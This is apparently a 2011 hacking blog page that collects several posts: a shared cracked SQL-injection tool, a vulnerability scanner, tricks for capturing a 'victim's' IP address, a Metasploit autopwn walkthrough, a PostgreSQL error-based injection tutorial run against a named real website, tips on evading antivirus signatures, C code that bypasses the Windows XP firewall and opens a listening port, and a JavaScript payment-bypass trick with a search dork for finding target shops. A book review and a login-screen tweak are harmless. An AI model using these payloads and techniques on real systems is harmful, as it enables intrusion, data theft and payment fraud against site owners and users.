Wednesday, June 29, 2011

Pangolin Professional working Tested

I am using and it is works ..IT  is better than Havij because it Can Work with https and also you can upload files with load file function .

also please use only in vmware because i am not sure if it is 100 % clean .

Download Info


Rce,Lfi,Rfi,Sqli scanner Darkjumper v5.8

RE:   Darkjumper v5.8 Sqli,Lfi,Rfi,Rce scanner 
Darkjumper is a free tool who will try to find every website that hosts at the same server as your target. Then check for every vulnerability of each website that host at the same server.

Here are some key features of "Darkjumper":

·Scan sql injection, rfi, lfi, blind sql injection
· Autosql injector
· Proxy support
· Verbocity
· Autoftp bruteforcer
· IP or Proxy checker and GeoIP

Requirements:

· Python

Screenshot: 



Download link: http://mac.softpedia.com/get/Security/Darkjumper.shtml

How to get IP address of another computer remotely

Hello friends, today i will explain you how to get IP address of any computer remotely. Using some very basic tricks we can find the IP address of any remote computer and then you can start your further hacking into the remote system like port scanning and finding vulnerabilities to enter in to the system and hack it. There are several methods to get an IP address of the victim but i will share few and specially the best one's that can tell you IP address in just few clicks and also all are free methods and special thing is about it is all are manual methods that means you did not require any tool.
how to find ip address of another computer remotely
How to find or get Ip address of somebody else remotely

4 ways to get the IP address of the Victim or another Computer:
1. Using PHP notification Script
2. Using Blogs and Websites
3. Using Read Notify service
4. Sniffing during Gmail and yahoo chat  sessions

As we are here to learn concepts so i will first explain what is an IP address and what's its importance. So friends very basic question What is an IP address? Why its important for hackers and security professionals?

What is an IP address? 
Basically IP address (Internet Protocol address) is a unique numerical value that is assigned to any computer or printer on a computer network that uses an internet protocol for communication purpose. Protocol is basically rules( for Network its rules for communication). 
IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing

For exploring more about IP addressing read on wikipedia.


How to Find IP address of another computer?

1. Using PHP notification Script
Using this Notification script you can get the IP address in just seconds. Steps of using this PHP script:
a. Download the PHP notify script and extract files.
b. Now you will get two files IP.html and index.php . You need to upload these two files to any free web hosting server.
Example: i used www.my3gb.com to upload these two files. Create an account there and upload these two files there as shown below.


c. Now you will need to send the link of index.php to the victim whose password you want to get. to get the link click on index.php shown in above snapshot. Now a new window will open copy the link in the address bar and send to the victim whose IP address you want.
d. Now when the victim opens the above link nothing will open but his Ip address is written into the ip.html file. So open the ip.html file to get his IP address.
e. That's all this method... I hope you liked it.


2. Using Blogs and Websites
This method is for those who have their blogs or websites. Normal users can also do this as blog is free to make. Make a new blog and use any stats service like histats or any other stats widget. Just add a new widget and put histats code there and save template. And send the link of your blog to your friend and get his IP.
That's only.


3. Using Read Notify service
This is an email based service. Steps to use Read Notify service:
a. First open the Read Notify website : RCPT
b. Now register on this website and then it will send you confirmation mail. Verify your account.
c. Once your account is activated. 
Do the following steps use this service:

  1. Compose your email just like you usually would in your own email or web email program
  2. Type:   .readnotify.com   on the end of your recipients email address (don't worry, that gets removed before your recipients receive the email). Like this: [email protected].readnotify.com  
  3. Send your email
Some things to remember: 
  • don't send to and from the same computer
  • if your email program 'auto-completes' email addresses from your address book, you'll need to keep typing over the top of the auto-completed one to add the .readnotify.com
  • if you are cc-ing your email to other readers, you must add tracking to all of them 


4.  Sniffing Yahoo and Gmail Chat sessions
With the help of Sniffers like ethereal, wireshark etc we can sniff the Gmail, and yahoo chat sessions while we are chatiing to any our friend and extract the IP address from there. I will explain this trick in detail in my next article as its a long article in itself.


5. Bonus Method for Online Gamers
We can also get the IP address from online games like counter strike, age of empires in Game ranger etc.. Many counter strike servers use amx mode. Just view which people are connecting and whats their IP addess as plugins show the IP address of people connecting to the game server.  If you have more access to counter strike server you can use status command in console. Just go to console and type "status"(without quotes) and press enter there you can see all players details his steam ID and much more depending upon server.

Now you have IP address but what you can do with an IP address. Ahhaah everything, that i will explain in my next article.

Monday, June 20, 2011

Thursday, June 16, 2011

Hacking with Nmap and Metasploit

Today I am writing a tutorial on hacking with Nmap with Metasploit.

First d/l Metasploit 3.3 from the official website,Link:

http://www.metasploit.com/

Let all that install, and towards the end of the installation it will ask if you would like Nmap installed also, choose yes. Once you have that installed the Metasploit screen will open up as shown below...

[Image: 1-2.jpg]

Now type db_create

Once you have typed that type nmap

This loads nmap, as shown below....

[Image: 11.gif]

You need to configure your scan now, I usually do a simple -sT -sV scan which will tell us the open ports and services running on the victims computer, Now type nmap -sT -sV xxx.xxx.xxx.x (X's being victims Ip number), Demonstrated below.

[Image: 11-1.gif]

Now give it 5 minutes to complete the scan,Once that is complete if your lucky you should get a response like this...

[Image: 12.gif]

This is basically a list of the open ports and services running on the target machine, Now the handy feature of the metasploit 3.3 framework is the autopwn feature, this basically searches and runs all matching exploits in the Metasploit database against the target machine and if successful will create a shell or similar privilege for the attacker.

Now once you have the nmap results delivered back to you showing the open ports and services type db_autopwn -p -t -e , From this point you will either have access to the victims computer through a successfully launched exploit or you will get a response saying the machine wasn't vulnerable to any of the exploits in the Metasploit database. Unfortunately on this particular machine I found it wasn't vulnerable as the image below proves.Good luck.

[Image: ff.gif]

Sunday, June 12, 2011

Saturday, June 11, 2011

Postgre Error based sqli Tutorial

Postgre:


Traditional relational database management systems (DBMSs) support a data model consisting of a collection of named relations, containing attributes of a specific type. In current commercial systems, possible types include floating point numbers, integers, character strings,
money, and dates.

Lets start to play with Postgre:

1st Step find the vulnerability:

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80'

ERROR: syntax error at or near "''"
its mean this website can be injected.remember errors can varies you wont get the same error every time.

2nd Step Columns count:


Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 order by 1--

get valid page

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 order by 2--

Error Executing Database Query.
ERROR: ORDER BY position 2 is not in select list
That Error shows that there is one column.

Lets try UNION SELECT query:

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--

Error Executing Database Query.
ERROR: UNION types character varying and integer cannot be matched

Seems like UNION SELECT query is not working !!!


Lets try Errorbased Postgre SQLi…

3rd Step:

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--


ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"

As we can see we got version of postgre DB server in the form of error.

Lets move on and find database name.

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "scoutsqld"
Scoutsqld is 1st database name you can variey offset to get other databases names.

scoutsqld is first database we can get others by changing offset :)

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: "template0"
template0 is 2nd database so you can increase offset till you got error.

Lets find out the user:

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--


Error Executing Database Query.

ERROR: invalid input syntax for integer: "postgres"

postgres is the user :)

Lets find the tables :>
4th step:


Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables  limit 1 offset 0) as int)--


Error Executing Database Query.

ERROR: invalid input syntax for integer: "pg_type"

pg_type is first table we can get others by changing offset :)

5th step:

Now we have to find the columns from our specific table !!!

e.g

our table is action

for that we have to use oracle char conversion.

Pg_type= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)

so our query is :

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)  limit 1 offset 0) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: " typname "
And further you can find the columns using offset..

Last step:
Now we have to extract data from our column .


Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: "bool"

Monday, June 6, 2011

How does Antivirus software works or detects virus

Hello friends, today i will explain you all how an anti-virus software works and detects virus. Most of you already know that what is anti-virus, but have you ever tried to understand how it works and why it requires updates regularly? How anti-virus searches for viruses and detects the virus in the file and eliminates it or heal it. Working of anti-virus involves two basic technologies namely:
1. Dictionary based continuous and fragmented string search
2. Suspicious activity detection (process manipulation)

antivirus working, how antivirus detects virus
How does anti-virus software works

So friends, lets start learning how an anti-virus works and detects virus and then eliminates and heals them.

Dictionary based continuous and fragmented string Search:

As the technique's name suggest, as dictionary signifies virus definitions database that is regularly updated as soon as new virus is being found (that is found by second technique). In dictionary based search technique, anti-virus software searches a string by comparing the file with strings existing in virus definition's or database.
 Now consider an hypothetical example for better understanding, suppose you have a file whose code is something like below:
ABCDEFGHIJKLMNOPQRSTUVWXYZ
Now when a virus infects a file what it does it manipulates the original file and adds some extra code or functionality to it so that the behavior of file  changes that means that defers from its normal functioning. So after virus infection file becomes something like this:
ABCDEFGHIJKLMNOPQRSTUVWXYZ012345
where 012345 is the string that virus has attached to the file after infection.
Now what does anti-virus database contains is that 012345 string . It matches the string in database with string in program or code and if it matches it identifies it as a virus.
Note: This all processing is done on binary format of codes and sometimes executable. 
Only if you manipulate the virus string that is 012345 and add some dead code between that something like below:
0a1a2a3a4a5a that means what we have done is added a between virus string but attached it in such a way that a does not affects the processing of string(virus). That means we have made new virus as this string is not there in the anti-virus database so it is not detected by anti-virus.
How can you add dead code, consider this string only 0a1a2a3a5a , read the character one by one and whenever character 'a' is found just skip the processing else concatenate the string and store that in new variable and use that variable in further processing of the code. This is how we makes any virus undetectable.
Note: But suspicious activity technique might detect this way as functionality of virus string is same.

That's the main reason why anti-virus needs updates regularly. Anti-virus companies daily adds new detected strings to their database so that the user can remain secure.

We can also bypass this using crypters too but as we are elite hackers and not script kiddies so i love to do this by manual editing rather than doing it by tools. Because if you do it using tools you will never come to know how its happening. And the day crypter becomes detectable your virus also becomes detectable. So friends i will recommend you that never depend on tools for hacking for two reasons:
1. You will never come to know the real scenario that what is happening in real time that means no knowledge. When the tool become detectable then you are noob again.
2. Most tools available are already infected with key-loggers and spy Trojans that inspect your system and send personal credentials to hackers who has created them.

Suspicious activity detection:


The most effective method to detect any malfunctioning in your system as it does not based of any search techniques rather it depends on the behavior of programs and files that how they act while they are executed or running. In this technique what happens is that anti-virus identifies the normal behavior of the file or program that what it should do when it is run without infection. Now if any file or program do any illegal processing like manipulating windows files integrity and protection then anti-virus identifies that file as virus and terminate that program and process related to it. That's the only reason why it detects patches and key-gens  as virus, as they try to manipulate the files by disassembling their integrity. 
The main drawback of this technique is that its quite annoying as sometimes it detects normal files as virus too but if you want to keep your PC safe then you need to do what your anti-virus suggests.
Also note one more thing, 99% patches and key-gens that you use to crack softwares are already infected with Trojans which are identity theft programs that steals your personal information and send them hackers. Some patches also contains back-doors that make your system open for attack similar to the way you have left your house main gate open for thieves in night....:P but its truth... 

So what is the lesson you have got from this article stop using pirated softwares and cracks to patch them otherwise you can be in great trouble. Solution for this is simple use trusted free wares as alternatives for paid tools rather than using their cracked versions...

How to Bypass Windows XP Firewall

How to Bypass Windows XP Firewall using C program.
Hello Friends, today i will share with you the technique using which we can bypass windows-xp service pack-2 firewall. Its a 100% working hack and its basically an exploit in windows XP.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.


Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.



Vulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.If an attacker adds a new key to the registry address of  
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
 the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Source Code :-

#include <*stdio.h*>
#include <*windows.h*>

#include <*ezsocket.h*>

#include <*conio.h*>

#include "Shlwapi.h"

int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];

HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);

strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");

RegOpenKeyEx(

HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;

struct sockaddr_in remote_addr;

fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");

sleep(3);

if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello
Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello
Pakistan\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, "quit"))
break;
}

ezsocket_exit();
return 0;
}

/* EoF */
Remove ** from the header files... easier to understand...Here we are just manipulating registry values using this program...

Saturday, June 4, 2011

Free Paypal "buy now" [Exploit]

This is a Simple bit of JavaScript that can bypass payments, the site's need to be sites like these:




http://livewebbanners.com/learn.shtml
or
http://www.tallentagency.com/YouTubeClone/index.htm

How to use it:
Copy the code (Below)
Go to the page that you'r doing it on
Paste the link you copied into the URL and it should start.


Code:
javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

Hope this really help's you and you save a bit off $ $


Another tip:

To find these site's Google - "this order button requires a javascript enabled browser"

Type that in the "quotes" into google.

BT4 Assuring Security by Penetration Testing

If you are working in the “information security” field, you must know the BackTrack distribution (otherwise you must be an alien coming from a far away planet!). If you search for the word “backtrack” on Amazon, you will find lot of references but only one book is fully dedicated to the Linux distribution: “BackTrack 4: Assuring Security by Penetration Testing“. I received a copy directly from the publisher and here is my review.

Just for those who are not familiar with BackTrack, it’s a Linux distribution made by security professionals for security professionals: It contains hundreds of tools to perform security assessments and penetration tests. Some of them are well-known like Metasploit, WebScarab or sqlmap and others are real gems (example: ua-tester which was added recently) and  increase the quality of the toolbox version after version.
Even if BackTrack 5 was released a few weeks ago, it does not reduce the book quality. There are so many tools that a single volume is not enough to cover all of them.The following chapters covered the classic penetration testing schema:
  • Target scoping
  • Information gathering
  • Target discovery
  • Enumerating target
  • Vulnerability mapping
  • Social engineering
  • Target exploitation
  • Privilege escalation
  • Maintaining access
  • Documentation and reporting
Each chapter reviews the most interesting tools (according to the authors) to achieve the chapter topic. Tools are briefly explained with examples. Straight to the point!
So, who’s need this book? The author’s goal is certainly not to give recipes on “how to hack a website“. The book must been see as a reference for those who already know the BackTrack distribution or who want to learn it. Don’t forget: this is just a toolbox, it does not prevent you to use your brain!
More information about the book here.
Regards
Adnan Anjum.

Thursday, June 2, 2011

Make Your Computer Login Screen Like FBI Tunnel

[Image: img20110327121913.jpg]



Step 1 : Download Logon Studio ,

Image

LogonStudio 1.7 | 7Mb

Information:

Longing for some change in your life? Why not start with that boring old Windows XP logon screen? With the freeware LogonStudio, choosing another screen is a matter of two clicks. Alternately, you can design your own with a built-in editor.
The first option is a lot easier. About 30 cool screens are available on the WinCustomize site, and the program can randomly select one on every boot. Editing is less straightforward. You build or modify logon screens by tweaking parameters on a lengthy list of elements. So you might, for instance, change the FirstColor parameter of the Centre Panel element to a new shade of blue. This allows you to customize everything from background to letterings to buttons, but beginners will find the process quite confusing. The sketchy online help isn't much assistance, either.


Download For Windows Vista(Works With WIndows 7 too)


Download For WindowsXp:


2, Download FBI Files From Here:


3, iF YOU WANT TO REMOVE SWITCH USER BUTTON THEN YOU CAN DO WITH THIS REGISTERY TWEAK.